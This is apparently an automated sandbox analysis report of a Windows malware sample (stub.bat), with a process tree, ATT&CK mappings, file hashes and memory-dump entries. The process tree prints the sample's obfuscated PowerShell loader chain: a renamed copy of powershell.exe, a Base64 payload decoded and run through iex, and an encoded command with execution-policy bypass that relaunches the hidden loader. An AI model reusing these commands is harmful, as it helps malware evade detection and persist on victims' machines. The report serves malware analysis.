C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2600

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2736
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /R /T
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:4832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2992

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3160

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2296
  - - C:\Users\Admin\AppData\Local\$ktm-powershell.exe
      "C:\Users\Admin\AppData\Local\$ktm-powershell.exe" -ep bypass -ec JABtAHQAeAAgAD0AIAAiAEcAbABvAGIAYQBsAFwASABqAFgAQgBGADUAWgBPADcAaQBVAGkAdgBoADkAWgBRAE0AYQBtACIAOwAgACQAbQB0AHgATwBiAGoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4ATQB1AHQAZQB4AF0AOgA6AE8AcABlAG4ARQB4AGkAcwB0AGkAbgBnACgAJABtAHQAeAApADsAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApACAAewAgACQAbQB0AHgATwBiAGoALgBXAGEAaQB0AE8AbgBlACgAKQA7ACAAJABtAHQAeABPAGIAagAuAFIAZQBsAGUAYQBzAGUATQB1AHQAZQB4ACgAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAGYAIAAkAHsAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQB9AFwAYAAkAGsAdABtAC0AbABvAGEAZABlAHIALgBwAHMAMQAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7ACAARQB4AGkAdAAgADAAOwAgAH0A
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3572

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3984

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3600

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4132

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3104

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:1500

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4540

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:1072

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2296

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000144 0000008c
1⤵
PID:3248

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000f0 0000008c
1⤵
PID:1820

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000124 0000008c
1⤵
PID:796

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000f4 0000008c
1⤵
PID:4804

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000120 0000008c
1⤵
PID:2440

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000f8 0000008c
1⤵
PID:3676

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000001b4 0000008c
1⤵
PID:668

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000001b8 0000008c
1⤵
PID:1016

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000018c 0000008c
1⤵
PID:3688

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000124 0000008c
1⤵
PID:2784

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000120 0000008c
1⤵
PID:3396

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000168 0000008c
1⤵
PID:1432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\$ktm-powershell.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xpzqpqy1.dzx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\perfc009.dat

Filesize
128KB

MD5
a9ae270f03cd818fc5ccb1fc114ed0f8

SHA1
57cfce4c18c0163fd41652ab89e4c51649eee492

SHA256
c08bb34abb284c2fb15d4372c2c3c2387f71ebeb920be89c9079e96c7a4ca3ec

SHA512
5fa35050038e187b0be9547ff86e49aa5272a273eefb83472758da5b818e4e86eba254422b4524fb7a4bd66bd5c3ae210162cab1247b601ea1a3fc6454703ef0

Download Submit
C:\Windows\System32\perfh009.dat

Filesize
699KB

MD5
a89ae42f5a026c19299f9fa3278556cd

SHA1
ec0a61aa2b89c9f80c734006446f124530e0f66b

SHA256
94ddaf67c6973113ef2992feab11bd2147194541c8c8efc82f7b51e89fc08a25

SHA512
fad978dd060c6a507d8be487d8478f4f550c2e3fa440c8b3f90c19771f9e2b0d34ead3fad6f026ea233bbd5ec0f5274b7dc6bab4ea4d090322d4406edd3a836e

Download Submit
C:\Windows\System32\wbem\Performance\WmiApRpl.h

Filesize
3KB

MD5
b133a676d139032a27de3d9619e70091

SHA1
1248aa89938a13640252a79113930ede2f26f1fa

SHA256
ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15

SHA512
c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5

Download Submit
C:\Windows\System32\wbem\Performance\WmiApRpl.ini

Filesize
29KB

MD5
ffdeea82ba4a5a65585103dd2a922dfe

SHA1
094c3794503245cc7dfa9e222d3504f449a5400b

SHA256
c20b11dff802aa472265f4e9f330244ec4aca81b0009f6efcb2cf8a36086f390

SHA512
7570527fdae4818f0fc780f9f141ab6a2d313cc6b3fdb1f7d7ff05d994ad77d3f8d168b1d77c2555d25dc487d24c18f2cc0eab505d1dd758d709f2576aac1a8a

Download Submit
memory/548-85-0x00007FFEDAEA6000-0x00007FFEDAEA7000-memory.dmp

Filesize
4KB

Download
memory/548-71-0x0000023DF03B0000-0x0000023DF03DC000-memory.dmp

Filesize
176KB

Download
memory/548-79-0x0000023DF03B0000-0x0000023DF03DC000-memory.dmp

Filesize
176KB

Download
memory/548-84-0x00007FFEDAEA3000-0x00007FFEDAEA4000-memory.dmp

Filesize
4KB

Download
memory/644-30-0x0000022609FB0000-0x0000022609FD6000-memory.dmp

Filesize
152KB

Download
memory/644-81-0x00007FFEDAEA4000-0x00007FFEDAEA5000-memory.dmp

Filesize
4KB

Download
memory/644-86-0x0000022609FB0000-0x0000022609FD6000-memory.dmp

Filesize
152KB

Download
memory/644-31-0x000002260A200000-0x000002260A22C000-memory.dmp

Filesize
176KB

Download
memory/644-41-0x00007FFE9AE90000-0x00007FFE9AEA0000-memory.dmp

Filesize
64KB

Download
memory/644-40-0x000002260A200000-0x000002260A22C000-memory.dmp

Filesize
176KB

Download
memory/644-32-0x000002260A200000-0x000002260A22C000-memory.dmp

Filesize
176KB

Download
memory/700-53-0x0000019E7B320000-0x0000019E7B34C000-memory.dmp

Filesize
176KB

Download
memory/700-54-0x00007FFE9AE90000-0x00007FFE9AEA0000-memory.dmp

Filesize
64KB

Download
memory/700-82-0x0000019E7B2F0000-0x0000019E7B316000-memory.dmp

Filesize
152KB

Download
memory/700-45-0x0000019E7B320000-0x0000019E7B34C000-memory.dmp

Filesize
176KB

Download
memory/700-942-0x0000019E7B2F0000-0x0000019E7B316000-memory.dmp

Filesize
152KB

Download
memory/780-89-0x000001B2DEF60000-0x000001B2DEF8C000-memory.dmp

Filesize
176KB

Download
memory/1004-943-0x000002E077D30000-0x000002E077D56000-memory.dmp

Filesize
152KB

Download
memory/1004-66-0x000002E077D60000-0x000002E077D8C000-memory.dmp

Filesize
176KB

Download
memory/1004-83-0x000002E077D30000-0x000002E077D56000-memory.dmp

Filesize
152KB

Download
memory/1004-67-0x00007FFE9AE90000-0x00007FFE9AEA0000-memory.dmp

Filesize
64KB

Download
memory/1004-58-0x000002E077D60000-0x000002E077D8C000-memory.dmp

Filesize
176KB

Download
memory/2296-19-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/2296-80-0x00007FFEB9D90000-0x00007FFEBA852000-memory.dmp

Filesize
10.8MB

Download
memory/2296-25-0x00000201F9DF0000-0x00000201F9E48000-memory.dmp

Filesize
352KB

Download
memory/2296-26-0x00000201FA280000-0x00000201FA288000-memory.dmp

Filesize
32KB

Download
memory/2296-0-0x00007FFEB9D93000-0x00007FFEB9D95000-memory.dmp

Filesize
8KB

Download
memory/2296-24-0x00007FFED9C40000-0x00007FFED9CFD000-memory.dmp

Filesize
756KB

Download
memory/2296-18-0x00000201FA150000-0x00000201FA1C4000-memory.dmp

Filesize
464KB

Download
memory/2296-17-0x00000201FA060000-0x00000201FA150000-memory.dmp

Filesize
960KB

Download
memory/2296-296-0x00000201FA540000-0x00000201FA548000-memory.dmp

Filesize
32KB

Download
memory/2296-922-0x00007FFEB9D90000-0x00007FFEBA852000-memory.dmp

Filesize
10.8MB

Download
memory/2296-16-0x00000201F9DE0000-0x00000201F9DEA000-memory.dmp

Filesize
40KB

Download
memory/2296-15-0x00000201F9DD0000-0x00000201F9DDE000-memory.dmp

Filesize
56KB

Download
memory/2296-13-0x00007FFEB9D90000-0x00007FFEBA852000-memory.dmp

Filesize
10.8MB

Download
memory/2296-11-0x00007FFEB9D90000-0x00007FFEBA852000-memory.dmp

Filesize
10.8MB

Download
memory/2296-10-0x00007FFEB9D90000-0x00007FFEBA852000-memory.dmp

Filesize
10.8MB

Download
memory/2296-9-0x00000201F9D60000-0x00000201F9D82000-memory.dmp

Filesize
136KB

Download